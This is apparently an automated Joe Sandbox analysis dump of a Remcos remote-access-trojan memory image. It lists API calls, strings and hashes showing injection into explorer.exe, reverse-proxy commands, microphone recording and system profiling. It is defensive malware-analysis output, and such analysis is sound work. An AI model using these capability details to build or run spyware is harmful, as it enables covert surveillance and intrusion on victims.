• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
• String ID: H
• API String ID: 4237864984-2852464175
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID:
• String ID: 65535$udp
• API String ID: 0-1267037602
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
• GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
• __dosmaperr.LIBCMT ref: 004393CD
• MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
• GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
• __dosmaperr.LIBCMT ref: 0043940A
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
• GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
• __dosmaperr.LIBCMT ref: 0043945E
• _free.LIBCMT ref: 0043946A
• _free.LIBCMT ref: 00439471
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
• String ID:
• API String ID: 2441525078-0
                                                                                                        • Opcode ID: 684e6fef7141b114c3b5ff973dde56bcea396d28ee1fdac90182f4155713f89e
                                                                                                        • Instruction ID: 902c93592471d116807dca9985149206a76c62e8192f2f9a6cc20a0486345b12
                                                                                                        • Opcode Fuzzy Hash: 684e6fef7141b114c3b5ff973dde56bcea396d28ee1fdac90182f4155713f89e
                                                                                                        • Instruction Fuzzy Hash: F531F17140820ABBEF11AFA5DC449AF3B78EF09364F14016AF81066291DB79CC12DBA9
                                                                                                        APIs
                                                                                                        • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                                                                        • TranslateMessage.USER32(?), ref: 00404F30
                                                                                                        • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                                                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                                                                        • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                        • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                        • API String ID: 2956720200-749203953
                                                                                                        • Opcode ID: d95b725b73043253d910ff3d91bf1cb07a4818691f21f3f92f09bd026dddf236
                                                                                                        • Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
                                                                                                        • Opcode Fuzzy Hash: d95b725b73043253d910ff3d91bf1cb07a4818691f21f3f92f09bd026dddf236
                                                                                                        • Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A
                                                                                                        APIs
                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                                                                        • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                                        • String ID: <$@$@FG$@FG$Temp
                                                                                                        • API String ID: 1107811701-2245803885
                                                                                                        • Opcode ID: d3d63833d8ab8f1d961b4a1da5279e22cff83bf31b029fb53a98ed145dc2fc76
                                                                                                        • Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
                                                                                                        • Opcode Fuzzy Hash: d3d63833d8ab8f1d961b4a1da5279e22cff83bf31b029fb53a98ed145dc2fc76
                                                                                                        • Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                                                                        • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe), ref: 00406705
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CurrentProcess
                                                                                                        • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                                                                        • API String ID: 2050909247-4145329354
                                                                                                        • Opcode ID: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                                                        • Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
                                                                                                        • Opcode Fuzzy Hash: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                                                        • Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D
                                                                                                        APIs
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
                                                                                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                        • String ID:
                                                                                                        • API String ID: 221034970-0
                                                                                                        • Opcode ID: fa1b8ca369088c977c56d8324615d0cdc0d6a29edab9bcf25d2a1dd6b7673671
                                                                                                        • Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
                                                                                                        • Opcode Fuzzy Hash: fa1b8ca369088c977c56d8324615d0cdc0d6a29edab9bcf25d2a1dd6b7673671
                                                                                                        • Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 00446DDF
                                                                                                          • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                          • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                        • _free.LIBCMT ref: 00446DEB
                                                                                                        • _free.LIBCMT ref: 00446DF6
                                                                                                        • _free.LIBCMT ref: 00446E01
                                                                                                        • _free.LIBCMT ref: 00446E0C
                                                                                                        • _free.LIBCMT ref: 00446E17
                                                                                                        • _free.LIBCMT ref: 00446E22
                                                                                                        • _free.LIBCMT ref: 00446E2D
                                                                                                        • _free.LIBCMT ref: 00446E38
                                                                                                        • _free.LIBCMT ref: 00446E46
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                        • Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
                                                                                                        • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                        • Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Eventinet_ntoa
                                                                                                        • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                                                                        • API String ID: 3578746661-4192532303
                                                                                                        • Opcode ID: 82bd679fba3198f42106cba0c187218fd625cbdf7536cebf2a2ea51cafd76be0
                                                                                                        • Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
                                                                                                        • Opcode Fuzzy Hash: 82bd679fba3198f42106cba0c187218fd625cbdf7536cebf2a2ea51cafd76be0
                                                                                                        • Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F
                                                                                                        APIs
                                                                                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DecodePointer
                                                                                                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                        • API String ID: 3527080286-3064271455
                                                                                                        • Opcode ID: 51615691f6b39088fe699d356a3785f8ab9cde05a1526f2a2544731867ca73e1
                                                                                                        • Instruction ID: 89d0c260ad138193cc60bb845925db7455dcb75d1c4d79333749f45855522aa5
                                                                                                        • Opcode Fuzzy Hash: 51615691f6b39088fe699d356a3785f8ab9cde05a1526f2a2544731867ca73e1
                                                                                                        • Instruction Fuzzy Hash: DA516D70900E09CBCF14DF99E9581BDBBB0FB09342F244297EC41A6266CB798A1DCB1D
                                                                                                        APIs
                                                                                                        • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                                                                          • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                        • Sleep.KERNEL32(00000064), ref: 00416688
                                                                                                        • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                        • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                        • API String ID: 1462127192-2001430897
                                                                                                        • Opcode ID: c9e55723ecb2ee04230f435addb8f16ed6a8a05fe378bed3b576d9dff6fd58f4
                                                                                                        • Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
                                                                                                        • Opcode Fuzzy Hash: c9e55723ecb2ee04230f435addb8f16ed6a8a05fe378bed3b576d9dff6fd58f4
                                                                                                        • Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
                                                                                                        APIs
                                                                                                        • _strftime.LIBCMT ref: 00401AD3
                                                                                                          • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                        • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                                                                        • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                                                        • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                        • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                                                                        • API String ID: 3809562944-3643129801
                                                                                                        • Opcode ID: a0d4b68123ccb8690edebec149ad94aabf9f76f5131ed63dacbc39586bcb4aec
                                                                                                        • Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
                                                                                                        • Opcode Fuzzy Hash: a0d4b68123ccb8690edebec149ad94aabf9f76f5131ed63dacbc39586bcb4aec
                                                                                                        • Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
                                                                                                        APIs
                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                                                                        • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                                                                        • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                                                                        • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                                                                        • waveInStart.WINMM ref: 00401A81
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                        • String ID: XCG$`=G$x=G
                                                                                                        • API String ID: 1356121797-903574159
                                                                                                        • Opcode ID: b9d79b778b34dfc6f1519f8bfd66b07f48f7a9fbc911d0f23052e1d1eeff0420
                                                                                                        • Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
                                                                                                        • Opcode Fuzzy Hash: b9d79b778b34dfc6f1519f8bfd66b07f48f7a9fbc911d0f23052e1d1eeff0420
                                                                                                        • Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                                                                        APIs
                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
                                                                                                          • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                                          • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                                          • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
                                                                                                        • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
                                                                                                        • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
                                                                                                        • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
                                                                                                        • TranslateMessage.USER32(?), ref: 0041C9FB
                                                                                                        • DispatchMessageA.USER32(?), ref: 0041CA05
                                                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                        • String ID: Remcos
                                                                                                        • API String ID: 1970332568-165870891
                                                                                                        • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                        • Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
                                                                                                        • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                        • Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b03e61c4093a21660133e67fc3f0c2c165a648bd703d9864a2b1dbb5c11dd296
                                                                                                        • Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
                                                                                                        • Opcode Fuzzy Hash: b03e61c4093a21660133e67fc3f0c2c165a648bd703d9864a2b1dbb5c11dd296
                                                                                                        • Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9
                                                                                                        APIs
                                                                                                        • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E03,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BD6
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C59
                                                                                                        • __alloca_probe_16.LIBCMT ref: 00452C91
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E03,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CEC
                                                                                                        • __alloca_probe_16.LIBCMT ref: 00452D3B
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D03
                                                                                                          • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D7F
                                                                                                        • __freea.LIBCMT ref: 00452DAA
                                                                                                        • __freea.LIBCMT ref: 00452DB6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                        • String ID:
                                                                                                        • API String ID: 201697637-0
                                                                                                        • Opcode ID: 33853d2748869a5bbf0e5c11ad0ba2693683b8c54e761c696d343b85774101d6
                                                                                                        • Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
                                                                                                        • Opcode Fuzzy Hash: 33853d2748869a5bbf0e5c11ad0ba2693683b8c54e761c696d343b85774101d6
                                                                                                        • Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68
                                                                                                        APIs
                                                                                                          • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                          • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                        • _memcmp.LIBVCRUNTIME ref: 004446A3
                                                                                                        • _free.LIBCMT ref: 00444714
                                                                                                        • _free.LIBCMT ref: 0044472D
                                                                                                        • _free.LIBCMT ref: 0044475F
                                                                                                        • _free.LIBCMT ref: 00444768
                                                                                                        • _free.LIBCMT ref: 00444774
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                        • String ID: C
                                                                                                        • API String ID: 1679612858-1037565863
                                                                                                        • Opcode ID: 17903f2486249c1948a877ea9dae5677bcd3f5fa43e019d40c9c3c4da5d63b1f
                                                                                                        • Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
                                                                                                        • Opcode Fuzzy Hash: 17903f2486249c1948a877ea9dae5677bcd3f5fa43e019d40c9c3c4da5d63b1f
                                                                                                        • Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: tcp$udp
                                                                                                        • API String ID: 0-3725065008
                                                                                                        • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                                        • Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
                                                                                                        • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                                        • Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                                                                        APIs
                                                                                                        • ExitThread.KERNEL32 ref: 004017F4
                                                                                                          • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                          • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                        • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                                                                          • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                        • __Init_thread_footer.LIBCMT ref: 004017BC
                                                                                                          • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                          • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                        • String ID: T=G$p[G$>G$>G
                                                                                                        • API String ID: 1596592924-2461731529
                                                                                                        • Opcode ID: b033b66669596b249d1ce25b62a4281e1d13c05af68800beb23af724c3c7b6f6
                                                                                                        • Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
                                                                                                        • Opcode Fuzzy Hash: b033b66669596b249d1ce25b62a4281e1d13c05af68800beb23af724c3c7b6f6
                                                                                                        • Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
                                                                                                        APIs
                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00437B41
                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                        • String ID: csm$m/
                                                                                                        • API String ID: 1170836740-240111175
                                                                                                        • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                        • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                                                                                                        • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                        • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
